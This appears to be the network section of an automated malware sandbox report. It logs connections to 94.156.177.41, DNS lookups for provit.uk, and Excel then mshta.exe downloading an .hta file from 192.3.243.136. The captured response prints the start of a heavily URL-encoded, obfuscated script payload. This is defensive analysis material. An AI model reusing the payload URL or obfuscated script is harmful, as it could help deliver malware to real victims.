                                                                    Nov 20, 2024 07:57:29.979437113 CET804920094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:30.103106976 CET4920180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:30.108089924 CET804920194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:30.108246088 CET4920180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:30.109941006 CET4920180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:30.114790916 CET804920194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:30.114919901 CET4920180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:30.119827032 CET804920194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:30.837785006 CET804920194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:30.837816000 CET804920194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:30.837963104 CET4920180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:30.838025093 CET4920180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:30.843034983 CET804920194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:30.978729963 CET4920280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:30.984548092 CET804920294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:30.984649897 CET4920280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:30.986397028 CET4920280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:30.992604017 CET804920294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:30.992768049 CET4920280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:30.997767925 CET804920294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:31.706429005 CET804920294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:31.706512928 CET804920294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:31.706612110 CET4920280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:31.709646940 CET4920280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:31.716016054 CET804920294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:32.051425934 CET4920380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:32.056376934 CET804920394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:32.056457996 CET4920380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:32.058171988 CET4920380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:32.062998056 CET804920394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:32.063041925 CET4920380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:32.067886114 CET804920394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:53.412939072 CET4922580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:53.412986994 CET4922580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:53.417983055 CET804922594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:53.553678989 CET4922680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:53.558686972 CET804922694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:53.558801889 CET4922680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:53.560519934 CET4922680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:53.565388918 CET804922694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:53.565464020 CET4922680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:53.570380926 CET804922694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:54.297231913 CET804922694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:54.297260046 CET804922694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:54.297504902 CET4922680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:54.297504902 CET4922680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:54.302370071 CET804922694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:54.446928024 CET4922780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:54.451946020 CET804922794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:54.452079058 CET4922780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:54.453720093 CET4922780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:54.458606005 CET804922794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:54.459147930 CET4922780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:54.464092016 CET804922794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:55.163341045 CET804922794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:55.163491011 CET804922794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:55.163738966 CET4922780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:55.163969040 CET4922780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:55.168792963 CET804922794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:55.304810047 CET4922880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:55.309830904 CET804922894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:55.309921026 CET4922880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:55.311486006 CET4922880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:55.316337109 CET804922894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:55.316399097 CET4922880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:55.321259022 CET804922894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:56.037281036 CET804922894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:56.037415981 CET804922894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:56.037599087 CET4922880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:56.037599087 CET4922880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:56.042606115 CET804922894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:56.180123091 CET4922980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:56.185132980 CET804922994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:56.185201883 CET4922980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:56.186849117 CET4922980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:56.191732883 CET804922994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:56.191792965 CET4922980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:56.196638107 CET804922994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:56.912216902 CET804922994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:56.912318945 CET4922980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:56.912734985 CET804922994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:56.912786961 CET4922980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:56.917175055 CET804922994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:57.045027018 CET4923080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:57.050061941 CET804923094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:57.050148010 CET4923080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:57.051752090 CET4923080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:57.056822062 CET804923094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:57.056886911 CET4923080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:57.061942101 CET804923094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:57.913125992 CET804923094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:57.913162947 CET804923094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:57.913305044 CET4923080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:57.913352966 CET4923080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:57.919025898 CET804923094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:58.051259995 CET4923180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:58.056250095 CET804923194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:58.056476116 CET4923180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:58.058877945 CET4923180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:58.063740015 CET804923194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:58.063832045 CET4923180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:58.069585085 CET804923194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:58.906354904 CET804923194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:58.907004118 CET804923194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:58.907092094 CET4923180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:58.918458939 CET4923180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:58.925815105 CET804923194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:59.301301003 CET4923280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:59.306411982 CET804923294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:59.306633949 CET4923280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:59.309000969 CET4923280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:59.314918041 CET804923294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:59.315018892 CET4923280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:59.320920944 CET804923294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:00.178472996 CET804923294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:00.178522110 CET804923294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:00.178852081 CET4923280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:00.178852081 CET4923280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:00.184000015 CET804923294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:00.392573118 CET4923380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:00.397557974 CET804923394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:00.397664070 CET4923380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:00.401304960 CET4923380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:00.406255007 CET804923394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:00.406323910 CET4923380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:00.411164999 CET804923394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:01.249268055 CET804923394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:01.249408960 CET4923380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:01.250149012 CET804923394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:01.250323057 CET4923380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:01.254920006 CET804923394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:01.390955925 CET4923480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:01.395924091 CET804923494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:01.396099091 CET4923480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:01.397597075 CET4923480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:01.402462006 CET804923494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:01.402549982 CET4923480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:01.407617092 CET804923494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:02.252270937 CET804923494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:02.252424955 CET804923494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:02.252445936 CET4923480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:02.252480030 CET4923480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:02.257306099 CET804923494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:02.399182081 CET4923580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:02.404226065 CET804923594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:02.404335976 CET4923580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:02.405973911 CET4923580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:02.410881996 CET804923594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:02.410938978 CET4923580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:02.415743113 CET804923594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:03.142828941 CET804923594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:03.143017054 CET804923594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:03.143132925 CET4923580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:03.143132925 CET4923580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:03.147969007 CET804923594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:03.269989967 CET4923680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:03.275120020 CET804923694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:03.275218964 CET4923680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:03.276879072 CET4923680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:03.281763077 CET804923694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:03.281827927 CET4923680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:03.286669970 CET804923694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:04.012312889 CET804923694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:04.012398958 CET804923694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:04.012582064 CET4923680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:04.012582064 CET4923680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:04.017515898 CET804923694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:04.141715050 CET4923780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:04.146780014 CET804923794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:04.146848917 CET4923780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:04.148475885 CET4923780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:04.153599024 CET804923794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:04.153650999 CET4923780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:04.158505917 CET804923794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:05.015336037 CET804923794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:05.015654087 CET4923780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:05.015827894 CET804923794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:05.015867949 CET4923780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:05.020538092 CET804923794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:05.158478022 CET4923880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:05.163924932 CET804923894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:05.164001942 CET4923880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:05.165608883 CET4923880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:05.170644999 CET804923894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:05.170720100 CET4923880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:05.175673962 CET804923894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:05.888010025 CET804923894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:05.888117075 CET804923894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:05.888261080 CET4923880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:05.888427019 CET4923880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:05.893320084 CET804923894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:06.029975891 CET4923980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:06.035279989 CET804923994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:06.035362959 CET4923980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:06.037022114 CET4923980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:06.041963100 CET804923994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:06.042036057 CET4923980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:06.047008038 CET804923994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:06.878705025 CET804923994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:06.878837109 CET4923980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:06.878928900 CET804923994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:06.878984928 CET4923980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:06.884042978 CET804923994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:07.020375967 CET4924080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:07.025450945 CET804924094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:07.025538921 CET4924080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:07.027129889 CET4924080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:07.032279015 CET804924094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:07.032370090 CET4924080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:07.037302017 CET804924094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:07.903635025 CET804924094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:07.903692007 CET804924094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:07.903784990 CET4924080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:07.903820992 CET4924080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:07.913734913 CET804924094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:08.053921938 CET4924180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:08.059031963 CET804924194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:08.059108973 CET4924180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:08.073318958 CET4924180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:08.079600096 CET804924194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:08.079653025 CET4924180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:08.084486008 CET804924194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:08.914391994 CET804924194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:08.914417982 CET804924194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:08.914515018 CET4924180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:08.914552927 CET4924180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:08.919532061 CET804924194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:09.063486099 CET4924280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:09.069010973 CET804924294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:09.069102049 CET4924280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:09.070729971 CET4924280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:09.075655937 CET804924294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:09.075720072 CET4924280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:09.080656052 CET804924294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:09.790751934 CET804924294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:09.790944099 CET4924280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:58:09.791009903 CET804924294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:58:09.791059017 CET4924280192.168.2.2294.156.177.41
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2024 07:56:31.405399084 CET | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2024 07:56:31.415816069 CET | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Nov 20, 2024 07:56:34.360862017 CET | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2024 07:56:34.384808064 CET | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Nov 20, 2024 07:57:08.725164890 CET | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2024 07:57:08.743362904 CET | 53 | 62751 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 20, 2024 07:56:31.405399084 CET | 192.168.2.22 | 8.8.8.8 | 0xa150 | Standard query (0) | provit.uk | A (IP address) | IN (0x0001) | false
Nov 20, 2024 07:56:34.360862017 CET | 192.168.2.22 | 8.8.8.8 | 0x4ba6 | Standard query (0) | provit.uk | A (IP address) | IN (0x0001) | false
Nov 20, 2024 07:57:08.725164890 CET | 192.168.2.22 | 8.8.8.8 | 0xcc3e | Standard query (0) | provit.uk | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 20, 2024 07:56:31.415816069 CET | 8.8.8.8 | 192.168.2.22 | 0xa150 | No error (0) | provit.uk | | 198.244.140.41 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 07:56:34.384808064 CET | 8.8.8.8 | 192.168.2.22 | 0x4ba6 | No error (0) | provit.uk | | 198.244.140.41 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 07:57:08.743362904 CET | 8.8.8.8 | 192.168.2.22 | 0xcc3e | No error (0) | provit.uk | | 198.244.140.41 | A (IP address) | IN (0x0001) | false
• provit.uk
• 192.3.243.136
• 94.156.177.41
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49164 | 192.3.243.136 | 80 | 3192 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:56:32.373878956 CET | 397 | OUT | GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 192.3.243.136
Connection: Keep-Alive
Nov 20, 2024 07:56:32.962903976 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 20 Nov 2024 06:56:32 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Wed, 20 Nov 2024 01:22:20 GMT
ETag: "2c850-6274dfb369376"
Accept-Ranges: bytes
Content-Length: 182352
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/hta
Data Ascii: <script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252522%2525253C%25252521DOCTYPE%25252520html%2525253E%2525250A%2525253Cmeta%25252520http-equiv%2525253D%25252522X-UA-Compatible%25252522%25252520content%2525253D%25252522IE%2525253DEmulateIE8%25252522%25252520%2525253E%2525250A%2525253Chtml%2525253E%2525250A%2525253Cbody%2525253E%2525250A%2525253CscRipt%25252520Type%2525253D%25252522TexT/vbsCRipT%25252522%2525253E%2525250ADim%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49166 | 192.3.243.136 | 80 | 3492 | C:\Windows\System32\mshta.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:56:35.301343918 CET | 474 | OUT | GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Range: bytes=8896-
Connection: Keep-Alive
Host: 192.3.243.136
If-Range: "2c850-6274dfb369376"
Nov 20, 2024 07:56:35.879904032 CET | 1236 | IN | HTTP/1.1 206 Partial Content
Date: Wed, 20 Nov 2024 06:56:35 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Wed, 20 Nov 2024 01:22:20 GMT
ETag: "2c850-6274dfb369376"
Accept-Ranges: bytes
Content-Length: 173456
Content-Range: bytes 8896-182351/182352
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/hta
                                                                    Data Raw: 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 [TRUNCATED]
                                                                    Data Ascii: 509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%252
                                                                    Nov 20, 2024 07:56:35.880037069 CET224INData Raw: 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35
                                                                    Data Ascii: 52509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509UxtkIthyqsLFIkGMWINdfZtDNUyfSGrGiuuLxalrwPaTBJYqmFsWvkrThHzpCOpBeCZLaGGzXovaaDqkVITrwBkNhQyTpZqAgKQnlzzyoFFcajQUtGXodngK
